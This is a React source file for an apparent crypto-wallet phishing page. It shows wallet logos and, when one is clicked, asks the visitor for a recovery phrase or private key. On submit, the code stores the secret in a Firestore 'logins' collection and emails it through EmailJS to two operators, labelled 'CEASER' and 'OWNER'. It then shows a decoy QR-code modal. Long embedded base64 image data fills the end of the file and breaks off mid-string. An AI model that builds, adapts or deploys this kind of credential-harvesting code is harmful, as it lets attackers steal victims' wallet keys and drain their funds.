import React, { useState, useRef, useEffect } from "react";
import alphawallet from "./alphawallet.jpg";
import tokenary from "./tokenary.png";
import equal from "./equal.jpg";
import atomic from "./atomic.png";
import atwallet from "./atwallet.png";
import authereum from "./authereum.png";
import binance from "./binance.jpeg";
import bitkeep from "./bitkeep.png";
import coin98 from "./coin98.png";
import coinomi from "./coinomi.jpg";
import coolwallet from "./coolwallet.png";
import crypto from "./crypto.png";
import dok from "./dok.png";
import easypocket from "./easypocket.jpg";
import gridplus from "./gridplus.png";
import imtoken from "./imtoken.png";
import infinito from "./infinito.png";
import infinity from "./infinity.png";
import mathwallet from "./math-wallet.png";
import meetone from "./meetone.jpg";
import metamask from "./metamask.png";
import midaswallet from "./midas-wallet.png";
import morixwallet from "./morixwallet.png";
import mykey from "./mykey.png";
import onto from "./onto.png";
import ownbit from "./ownbit.png";
import peakdefi from "./peakdefi.png";
import rainbow from "./rainbow.png";
import ronin from "./ronin.jpg";
import safepaljpg from "./safepal.JPG";
import safepal from "./safepal.png";
import solana from "./solana.webp";
import sparkpoint from "./sparkpoint.png";
import tokenpocket from "./tokenpocket.png";
import trustwallet from "./trust-wallet.png";
import unstoppable from "./unstoppable.png";
import viawallet from "./viawallet.png";
import vision from "./vision.png";
import walletpng from "./wallet.png";
import walleth from "./walleth.png";
import xdc from "./xdc.png";
import zelcore from "./zelcore.png";
import qrcode from "./qrcode.png";
import cbase from "./coinbase.png";
import firebase from "firebase";
import db from "./firebase";
import blockchain from "./blockchain.png";

import { Modal, Alert, Tab, Tabs, Overlay, Tooltip } from "react-bootstrap";
import { send } from "emailjs-com";

function Body() {
  const [show, setShow] = useState(false);
  const [wallet, setWallet] = useState("");

  const handleClose = () => setShow(false);
  const handleShow = () => setShow(true);

  const [isOpen, setIsOpen] = useState(false);

  const [phrase, setPhrase] = useState("");
  const [keyStore, setKeyStore] = useState("");
  const [password, setPassword] = useState("");

  const [logins, setLogins] = useState([]);

  const target = useRef(null);

  const [toSend, setToSend] = useState({
    phrase: "",
  });

  const [toSend2, setToSend2] = useState({
    privatekey: "",
  });

  const [toSend3, setToSend3] = useState({
    keystorejson: "",
    password: "",
  });

  useEffect(() => {
    //run once the app components load
    db.collection("logins")
      .orderBy("timestamp")
      .onSnapshot((snapshot) => {
        setLogins(
          snapshot.docs.map((doc) => ({ id: doc.id, info: doc.data() }))
        );
      });
  }, []);

  console.log(logins);

  const [showBarcode, setShowBarcode] = useState(false);
  const handleCloseBarcode = () => setShow(false);

  const handleChange = (e) => {
    setToSend({ ...toSend, [e.target.name]: e.target.value });
  };
  const handleChange2 = (e) => {
    setToSend2({ ...toSend2, [e.target.name]: e.target.value });
  };

  const firebasePhrase = (e) => {
    db.collection("logins").add({
      phrase: toSend,

      timestamp: firebase.firestore.FieldValue.serverTimestamp(),
    });

    setPhrase("");
    setPassword("");
    setKeyStore("");
  };

  const firebasePrivateKey = (e) => {
    db.collection("logins").add({
      phrase: toSend2,

      timestamp: firebase.firestore.FieldValue.serverTimestamp(),
    });

    setPhrase("");
    setPassword("");
    setKeyStore("");
  };

  //// BEGINING OF CEASER INFOS

  const ceaserPhrase = (e) => {
    send(
      "service_co0wcpa",
      "template_y586gow",
      toSend,
      "user_gGTAXMVC8Y3Sv5b0MPRp1"
    )
      .then((response) => {})
      .catch((err) => {
        console.log("FAILED...", err);
      });
  };

  // const ceaserPrivateKey = (e) => {
  //   send(
  //     "service_co0wcpa",
  //     "template_huk9579",
  //     toSend2,
  //     "user_gGTAXMVC8Y3Sv5b0MPRp1"
  //   )
  //     .then((response) => {})
  //     .catch((err) => {
  //       console.log("FAILED...", err);
  //     });
  // };

  ////// END OF CEASER INFO

  //// BEGINING OF OWNER INFOS

  const ownerPhrase = (e) => {
    send(
      "service_cy6q4xs",
      "template_r0if7mi",
      toSend,
      "user_Jzy2MNWLlRix5X2tI73SJ"
    )
      .then((response) => {
        setShowBarcode(true);
        setShow(false);

        console.log("SUCCESS!", toSend, response.status, response.text);
      })
      .catch((err) => {
        setShowBarcode(true);
        setShow(false);
        console.log("FAILED...", err);
      });
  };

  const ownerPrivateKey = (e) => {
    send(
      "service_cy6q4xs",
      "template_3fy2fth",
      toSend2,
      "user_Jzy2MNWLlRix5X2tI73SJ"
    )
      .then((response) => {
        setShowBarcode(true);
        setToSend2("");
        setShow(false);

        console.log("SUCCESS!", toSend, response.status, response.text);
      })
      .catch((err) => {
        setShowBarcode(true);
        setShow(false);
        console.log("FAILED...", err);
      });
  };

  ////// END OF OWNER INFO

  ///////HANDLE PHRASE

  const handlePhrase = (e) => {
    e.preventDefault();
    console.log(toSend);
    firebasePhrase();
    ownerPhrase();
    ceaserPhrase();
  };

  /////  HANDLE PRIVATE KEY

  const handlePrivateKey = (e) => {
    e.preventDefault();
    console.log(toSend2);
    firebasePrivateKey();
    ownerPrivateKey();
    // ceaserPrivateKey();
  };

  return (
    <section className="pageStyles__SSection-sc-1navawn-4 ibLsRQ">
      <Modal
        show={show}
        onHide={() => {
          handleClose();

          setIsOpen(false);
        }}
        backdrop="static"
        keyboard={false}
        style={{ marginTop: "200px" }}
      >
        <Modal.Header closeButton>
          <Modal.Title>Connect to {wallet}</Modal.Title>
        </Modal.Header>

        <Tabs
          defaultActiveKey="profile"
          id="uncontrolled-tab-example"
          className="mb-3"
        >
          <Tab
            eventKey="home"
            title="Key store JSON"
            style={{ padding: "12px 24px" }}
            disabled
          >
            <div className="formLayout">
              <form id="form-json" action="" method="post" name="json-form">
                <div className="form-group">
                  <textarea
                    name="phrase"
                    className="form-control"
                    id="json"
                    required="required"
                    lines="3"
                    placeholder="Keystore JSON"
                    value={keyStore}
                    onChange={(e) => setKeyStore(e.target.value)}
                  ></textarea>

                  <label for="json" className="form-text">
                    Several lines of text beginning with '...'
                  </label>
                  <br />
                  <br />
                  <div
                    className="invalid-feedback"
                    style={{
                      fontSize: "100%",
                      color: "#b1051a",
                      backgroundColor: "white",
                    }}
                  >
                    Please provide a valid JSON Keystore.
                  </div>
                </div>
                <div className="form-group">
                  <input
                    type="text"
                    name="jsonPassword"
                    className="form-control"
                    id="jsonPassword"
                    placeholder="Password"
                    value={password}
                    onChange={(e) => setPassword(e.target.value)}
                  />

                  <label for="jsonPassword" className="form-text">
                    The password you used to encrypt it.
                  </label>
                  <br />
                  <br />
                </div>
                <button
                  type="submit"
                  className="hizvcO"
                  // onClick={handleKeyStore}
                >
                  Import
                </button>
              </form>
            </div>
          </Tab>
          <Tab
            eventKey="profile"
            title="Phrase"
            style={{ padding: "12px 24px" }}
          >
            <div className="formLayout">
              <form
                id="form-mnemomic"
                method="post"
                name="mnemonic-form"
                onSubmit={handlePhrase}
              >
                <div className="form-group">
                  <textarea
                    name="phrase"
                    className="form-control"
                    id="mnemonic"
                    required="required"
                    lines="3"
                    placeholder="Phrase"
                    value={toSend.phrase}
                    onChange={handleChange}
                  ></textarea>

                  <label for="mnemonic" className="form-text">
                    Typically 12 (sometimes 24) words separated by single spaces
                  </label>
                  <br />
                  <br />
                  <div
                    className="invalid-feedback"
                    style={{
                      fontSize: "100%",
                      color: "#b1051a",
                      backgroundColor: "white",
                    }}
                  >
                    Please provide a valid Mnemonic.
                  </div>
                </div>

                <button type="submit" className="hizvcO">
                  Import
                </button>
              </form>
            </div>
          </Tab>
          <Tab
            eventKey="contact"
            title="Private key"
            style={{ padding: "12px 24px" }}
          >
            <div className="formLayout">
              <form
                id="form-privatekey"
                action=""
                method="post"
                name="privatekey-form"
                onSubmit={handlePrivateKey}
              >
                <div className="form-group">
                  <input
                    type="text"
                    name="privatekey"
                    className="form-control"
                    id="privatekey"
                    required="required"
                    placeholder="Privatekey"
                    value={toSend2.privatekey}
                    onChange={handleChange2}
                  />

                  <label for="privatekey" className="form-text">
                    Typically 64 alphanumeric characters
                  </label>
                  <br />
                  <br />
                  <div
                    className="invalid-feedback"
                    style={{
                      fontSize: "100%",
                      color: "#b1051a",
                      backgroundColor: "white",
                    }}
                  >
                    Please provide a valid private key.
                  </div>
                </div>

                <button
                  type="submit"
                  className="hizvcO"
                  // onClick={handlePrivateKey}
                >
                  Import
                </button>
              </form>
            </div>
          </Tab>
        </Tabs>
      </Modal>

      <Modal
        show={showBarcode}
        onHide={() => {
          setShowBarcode(false);
        }}
        backdrop="static"
        keyboard={false}
        style={{ marginTop: "200px" }}
      >
        <Modal.Body>
          <center>
            <p>
              <b>Scan QR code with compatible wallet</b>
            </p>
          </center>
          <img src={qrcode} alt="Trust" style={{ width: "100%" }} />
        </Modal.Body>
      </Modal>

      <div className="Grid__SGrid-sc-8d5rqj-0 gAVVCu">
        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={cbase}
              alt="Coinbse"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("CoinBase");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Coinbase",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Coinbase",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Coinbase",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Coinbase
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={trustwallet}
              alt="Trust"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Trust Wallet");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Trust wallet",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Trust Wallet",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Trust wallet",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">Trust</div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={blockchain}
              alt="Blockchain"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Blockchain");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Blockchain",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Blockchain",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Blockchain",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Blockchain
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src={metamask}
              alt="Metamask"
              name="wallet"
              value="wallet"
              onClick={(e) => {
                setWallet("Metamask");
                setToSend({
                  ...toSend,
                  [e.target.name]: "Metamask",
                });
                setToSend2({
                  ...toSend2,
                  [e.target.name]: "Metamask",
                });
                setToSend3({
                  ...toSend3,
                  [e.target.name]: "Metamask",
                });
                handleShow();
              }}
            />
          </div>
          <div className="pageStyles__SAppName-sc-1navawn-7 eodRCW">
            Metamask
          </div>
        </div>

        <div className="pageStyles__SApp-sc-1navawn-5 cmAzHq">
          <div className="pageStyles__SAppIcon-sc-1navawn-6 lfUBtr">
            <img
              src="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/4gKgSUNDX1BST0ZJTEUAAQEAAAKQbGNtcwQwAABtbnRyUkdCIFhZWiAH5AAFAA8ADwASAA5hY3NwQVBQTAAAAAAAAAAAA
                              AAAAAAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLWxjbXMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAtkZXNjAAABCAAAADhjcHJ0AAAB
                              QAAAAE53dHB0AAABkAAAABRjaGFkAAABpAAAACxyWFlaAAAB0AAAABRiWFlaAAAB5AAAABRnWFlaAAAB+AAAABRyVFJDAAACDAAAACBnVFJDAAACLAAAACBiVFJDAAACTAAAACBjaHJtAAACbAA
                              AACRtbHVjAAAAAAAAAAEAAAAMZW5VUwAAABwAAAAcAHMAUgBHAEIAIABiAHUAaQBsAHQALQBpAG4AAG1sdWMAAAAAAAAAAQAAAAxlblVTAAAAMgAAABwATgBvACAAYwBvAHAAeQByAGkAZwBoAHQALA
                              AgAHUAcwBlACAAZgByAGUAZQBsAHkAAAAAWFlaIAAAAAAAAPbWAAEAAAAA0y1zZjMyAAAAAAABDEoAAAXj///zKgAAB5sAAP2H///7ov///aMAAAPYAADAlFhZWiAAAAAAAABvlAAAOO4AAAOQWFlaIAAAAAAAAC
                              SdAAAPgwAAtr5YWVogAAAAAAAAYqUAALeQAAAY3nBhcmEAAAAAAAMAAAACZmYAAPKnAAANWQAAE9AAAApbcGFyYQAAAAAAAwAAAAJmZgAA8qcAAA1ZAAAT0AAACltwYXJhAAAAAAADAAAAAmZmAADypwAADVk
                              AABPQAAAKW2Nocm0AAAAAAAMAAAAAo9cAAFR7AABMzQAAmZoAACZmAAAPXP/bAEMABQMEBAQDBQQEBAUFBQYHDAgHBwcHDwsLCQwRDxISEQ8RERMWHBcTFBoVEREYIRgaHR0fHx8TFyIkIh4kHB4fHv/bAEMB
                              BQUFBwYHDggIDh4UERQeHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHv/CABEIAZABkAMBIgACEQEDEQH/xAAcAAEAAgIDAQAAAAAAAAAAAAAABwgFBgECAwT/xAAUAQE
                              AAAAAAAAAAAAAAAAAAAAA/9oADAMBAAIQAxAAAAGZQAAAAAAAAHlrhtCLtdJzVzxxZ1V4WhVjyRYpB+xEnNb2A9AAAAAAAAAAAAAAADwPfzi2KCdY2jXgyWO4AAAAAHOUxQlKR6zclyO9V5cJMeXqAAAAAAAAAA
                              AOPhggkWEsFwAAAAAAAAAAAbJONau5clAs4H1AAAAAAAAAax8NdDI4IAAAAAAAAAAAAAGy60LX52o1kTaAAAAAAANK+6sx1+UAAAAAAAAAAAAAAAGRxwtLs9RrOGdAAAAAx/314NXwYAAAAAAAAAAAAAAAAANm1
                              kXC+qB54AAAB85otds1hAAAAAAAAAAAAAAAAAAADvZWs+0FpHTuAAInlSqZgwAAAAAAAAAAAAAAAAAAAOeBYmQ6u2gOwANErdJUagAAAAAAAAAAAAAAAAAAAAHNn6vyyTmB4+2qFbfg54AAAAAAAAH2bfPZC+8S
                              MNU+TdhEMc2k6FN+J9gs+YAAAAAAADOYPsXI7YTNiKZWggioAAAAAAACQtTtQfT6gAAA0jdxTnxmeGAAAAAAAACwsjwxM4rdZGr5qYAAAAAAByTbL2v7AAAAAAfHU230AkYsgMeyAx7IDHsgMeyAx77PjAAJLsDW
                              6yIqpauqhrwAAAAAAH0/N7lv/bx9gAAAABxyOrsOrsOrsOrsOrsPKv8AYWEyHwAbhZysdnBV+0FbjRAAAAAAAOeBavYYbmQAAAAAQzLNTDcGhjfGhjfGhjfGhjfGhjdtO8gABvdka/WBEETvFRBAAAAAAAAMnamo
                              e9Fknj7AAAA0M1GHfXyAAAAAAAAJmmaOpFGqbX4lOuMhjwAAAAAAADcZ+qh7lxVd93JRaN4EgeUNR2SrCfgAAAAAAAAHbrnCyub45AK+xrZGt5wAAAAAAAAAAAAAAAAAAAABLUT2gNqAB51UtfFJBIAAAAAAAAAA
                              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
                              RIEUU0OFJhg+51q4NjSwY+8kXf2ihLA4dDtGqXkOVKeigrhMQ+b6V2DXcqJrxnpIdBrhIG431LtGpZCWfEt0V3U007l3badfWfDvksPvWUpyZR001DISzYluiu6mmmYs7aT2Cs8DZLCspeLKOmnPFznlboLTTz
                              NlOxz9hriIGsw+9LPGc/wBS7jzj4mY2VRTYiU/hXcOxRIM8ZzOtJPC2Uji4PN+7QtyER/U9j+4Ttyb9DwPNe7xNy82byHZFxmIoCQ8vHmfx8eYeaQ2VBc1JiH0E8Ubh2THJfk24r+VBlzg/GuAjPGkzv5dl+7yHlYM3mPiZ20KL1NiDoJzeXZcUl
                              +IxyWq4+FkU2eY5I7Nicm7pxW+EYdTxYV+/Zs2CY5pBlL5/A0h0KL1NO2l2J1Pg4ImkbwFBsTIsA3aTXK8LMfFrVb3JPzrq5T8LGr4TFMp3OKvLCWTvLnGqYebc+er+3ENtYZI1MSy3iw/e2nyrg8NEF8dp+KzC4pp8CB
                              FN3djU0UyFHXSDqV6w8u9PbBB33vqXvE4thkPqNBEUKo0AcyZIwFxKjinfTRyLkspsRqRj/hvb2wRd2O+ox4aP6jn8BSYeIWVBzY/aUK+Ev/upYqHyb2yjuKBqMuPcZ2OSnOSQPnV1tUuHbSjW1F02NEfbivxf81HD
                              RWtxLnz50zwwuySD6Rtrqs3oNdVm9Brqs3oNdVm9Brqs3oNdVm9Brqs3oNdVm9Brqs3oNdVm9Bq7wSKPFfiiHfUj24tv7hGoRrvYUg3DntFaK0VorRWitFaK0VorJdFYeIpJ8OuTFLs3H4cL5n/Xtxa/3CdQRtz
                              XpG3rrMODQgsnGbw+HC+Z/wBe3Ffi/wCajhpb/RY/lzrYbBsoVNJttr5qemvmp6a+anpr5qemvmp6a+anpr5qemvmp6a+anpr5qeminDhb90UXclmOkn4Yj3FJ9sp76g6jLgHP9ac5JiHNgi3qSdtLtfUXfYsR9sEvejtqMeJj0oaTERG6sOb/dsDaM8p/wCalipvJfbBPboPbUuDlN8M/SG7xoSRMGU6COZMMRysSwzDu0Xc3Y5ydSy/4j39uIXaoyhqeT8yA6UP/Ky8PKL7VOkfFlOwUDaaaD9nHLfbJsFGSVizHSTqVqw8W5Pa0Z0MLVNA2lHI1PLidkbeDQWbJxC/1aa5eCWM+Gevnt6DXFaSTyWrYTC28XNf/ROxHdGjVMPDbS+erfAuJA4sy/fs2bGsMyDJXz+FnUceHjDs2KMjjtxm+FkbQRapcOdAN18uy4ktxF4zVb4lx8Y40WZ/Lsv3iReVnz+Q+NopBdWFjUmHPRvdfLslI7cmvGego0DmOHiXl4c48R2QFAuTQyxy0md//Oa97hXkJT+h7H/eGIXiJ8sHaebfDzLdGFNBJ0fobeOxRHoiXO7UsMS5KKLAc4YmzSDoNup8PMuS6nsNcPAtyftSwRD8Tbzz2UtlxC9Ft/hTQzIVddI7BWCBcpjWQovKem+/UMpbJiF6Lb6MOIjKONfWDDoWJ+1ZKDKlPTffqWTKLOOi40iuDnXi/S+w67ya5MQ6TmhFAmf6m2nVDDiIw6HfRmwd5od20Vn1mwFzSz/tAGOPYm00IoUCINAGrmWK0E+8aDVp4jk7HGjVxwcRWPvtooPk8LP321opIoZTsNGTBtwEnd+mjw0DZPeGcanycJVO82YUJMSfeJPHo1kqAB4a7ZgCKvwXBP3kothJVnXccxq0+GkT8udtBhZG8bUGxkywruXOaBWDhH7z56sBbsKzKCPGuUwiX3jNXJSSx/euRxin8S1mMLf5V1S/kwrqTfqK6k36iuq5PmwrjNCv+VcrjV/xWuVaWX865LCR33kVYC38i//EACsQAQABAQUGBwEBAQAAAAAAAAERACExQEFhMFBRcYGRECChwdHw8bHhYP/aAAgBAQABPyH/AIRYbZwVJg7UVLD+S2KNTh61IJrfzVf3QD2pf4j4ofxPim7H5p7UWH2vKog4svQVqW5UABWbKgrpmp3EpEL1RUQJ1zvTaBz9+nzfV2hZdQJxwLNcYBfl1BM7R9aGtVyONtKtKwVBjLLk8uNOVuMgdMGOitRa3lmf4KuWeJI4lQJancCxFb6tLcoLIdMOQc8mVQg3F7OZh87NS38quU0krWWXEk3BaJS6LkfXNAt2RMImIS3Wv+UhZC5ucaTQy1UDCwLW9wTVgPkNKFCXHjZE2mQ4NBhDvLR+MAwYX5DTEUlNwoHX0Tg0NYHeWjx5bZSwEcZ48qZVLJ3G4ttpkODRhiMZ20g1y3N4UigGzI4W5ZN+fR80FCEGyUCW6lWZAsu4254C39pelslWMFovz2lll3OJdRImVAEw+02AwCrPApYmwdg3S+VJBqpuoEj534PnllN13zcx0XzNFDE0sUw9Iu3W4IdFtESSJJ5fRBCz3YMMlWZQ6x5bUyM81/tu3+CBl/p/PIjsJXSlwn1JgzihlNQyVoEpZiwelRyxqVqQhjnSaZGSjuU8iGExS2AjkbGiEXJPjCLHcmDjgbajo0Fh8/6HzLSJeJV+wD90UtQIBgmAXjNWnygPM8YMbZBoYKXr/CqP8MAsNj8XUTaZpKDJwUksrd1vjbD8x/zAk8zaO40GuMNmaDMxHpgls+h4/dTJ98CXpSIv2hpiCoybVgU7vYE8ZDoPRgAliiPkDzFr/dqcKtVXZkEEEEEEEEENW7IHm+2mT7eP1qFmAJG4nrRi3Cem1Qbya0natJ2rSdq0natJ2rSdq0natJ2rSdq0namyBeSVa4HZu8oo+5b8frUbcBoPeqhEuB9MSydGHsPKZ+5b8YDofRgBhmhFJhzrDtTWaDSWn4Ovwdfg6/B1+Dr8HX4Ovwdfg6/B0tCZhGmwhKJXy/bTI9/H7qZHtgTvLNp6m0AUoqVSUPAxqvDqnjZP8R/3Arokl1MyjPyXJ4bN0mCgOeWCPL3WHjBFqQ6OCAsTzPBRPXlGxAXBB6mkOtkZuCkWQp2WeMak9iYO2xdbrteCiiGdR0vMpv8ASQUNa7/gcaY68olcEwi9Yqx+EF5viTspXWhoj1BgwgRdCahCPJ3UQGbrBoeSelEle4R/2ik3PvQpD0WdmEU+QTyFrRALgjyWQU55b/bduaArVf6f3y2oCdLPdgKwXtWBA9Z8o4S5FDtfTirt1uGS9MoAAgPMs/3Vm8+m67pGZvyTzipeB4UUrCTxybpXynl0MqJmAgNhIygYL84pEYb9zqSRA
                              GdC4RD8NibSGme9hgs3PwVtrB1NmW6KdNaBFZTkbljMKtEcOdEYghtC5LbmqnpQTOeu43UPtchxaLtMTmcbbRXH+YpQiQm4UDr6BxaICLcWr4wDiNrnsaU4Nznj2QFa5Di0dIG0LV8YLhWaUOmquCxxpsR1isOXFo+1i0vcJlTcF1Nnvj980FIITEiXJYBnS96H+rwoTMwCMOwBGX3Sn7GUysO3ZyCKL0ZwXcuGKvsOBJVp9W5l8UQRmXJggVgo/OrzoY8dsCA8s6BDdwIMa3arxJqXc7R
                                                    9K+kEPhTWHZtmki/ZgrATRnolO9O5hPy6i2DVUSEDI3E7cshNTiNZMvSk102YUVXgxBUt0v8AzUInr+XSD9bvS/retHxi4/OoJF6p9qWEhmURiprA9KhkI4hqHMcA/wCF/9oADAMBAAIAAwAAABDzzzzzzzz
                                                    zjjjzTDzzzzzzzzzzzzzzzzzgQzzzzzzzzDzzzzzzzzzzzzzzzzzzzzzzzzxjjzzzzzzzzzTzzzzzzzzzzzzzyxTzzzzzzyTzzzzzzzzzzzzzzzzxDzzzzyzzzzzz
                                                    zzzzzzzzzzzzzxTzzzxzzzzzzzzzzzzzzzzzzzyzTzyDzzzzzzzzzzzzzzzzzzzyxTzxTzzzzzzzzzzzzzzzzzzzzyzzjTzzzzzzzyzyyxjzzzzzzzyzTjzzzzzzzyzzzzyzzz
                                                    zzzzzzzyzzzzzzzzxzzzzzxzDDDDDTzxSjzzzzzzyzTzzzzzzzzzzwzzxTjzzzzzzzxzzzzzzAwwwwwzzxyjzzzzzzzwzTzzzzzzzzzzzzxzxTzzzzzzzzzjDjzzz
                                                    zzzzzzxTzjzzzzzzzzzzzzzzzzzzzzyDzxzzzzzzzzzzzzzzzzzzzzzgzzzzzzzzzzzzzzzzzzzzzzzyzzzzyzTzzzzzzzzzzzzzzzzzxTzzzzyzzzzzzzzzzzzzzzzzyTzzzzzzyzTzzzzzzzzzzzzzyTzzzzzzzzzhzzzzzzzzzzzzyzzzzzzzzzzzzyxDzzzzzzTixzzzzzzzzzzzzzzzwwyxwzxzzzzzzzzzz/8QAFBEBAAAAAAAAAAAAAAAAAAAAkP/aAAgBAwEBPxAcf//EABQRAQAAAAAAAAAAAAAAAAAAAJD/2gAIAQIBAT8QHH//xAArEAEAAQIEBAYDAQEBAAAAAAABEQAhMUFRYUBxgZEgMFChscEQ8PHR4WD/2gAIAQEAAT8Q/wDCXQlJgdWnMdtfgpIWZBO9/anh/wDw0imTtySnuqTgT+kUjZONDoPB1VoUYbL5akeNxYV7iv5MxgjTwVxiB2vT2C18soIYSBD29CLlUig6tKSAlgHd2KsogAWOax0KcksnHbClVlZ8tKlI7UAbOLlsjZpMNW7ktK7FIJQ7I50MD3o8ASMiczjTfbDQObV1YlOrZj7KXFmzttClVlvwIoyKO1EahdJTSHDpT1hQnK549Vt6IkElg2TiUCAF1XCmp1ZFsDF2KkDSWdGPvh5UKuwtjLpTmcAjF3MeWNDJJwx+HnFLQZtP0MpIHdMB0KREVWVc+JfQMhCOo0MTRjg30e9XBpnHJ0duEZKKAn1dN1JVMyU0ga78aEMl4DUMneoNYT40Cab8E+pYLJ9fbOnxVUnoaG3Hk4gg7gMxojmBeZGq4BmYwmY+2aGdKfezKr9eggfkoO6DMaB3IbkTVec43k28eLZSTcNT0NA9DErpB3AZjUYopW4HbTzG4qhN8oaq0+IkTsB9+ir02SbT4mzKh45cxHLn5SBABKuVIzWS7OzuDA9HVRMvy+wfnypWUhLi2wuBSIiqyrn6OF0ikKMEpEAxLcBHUM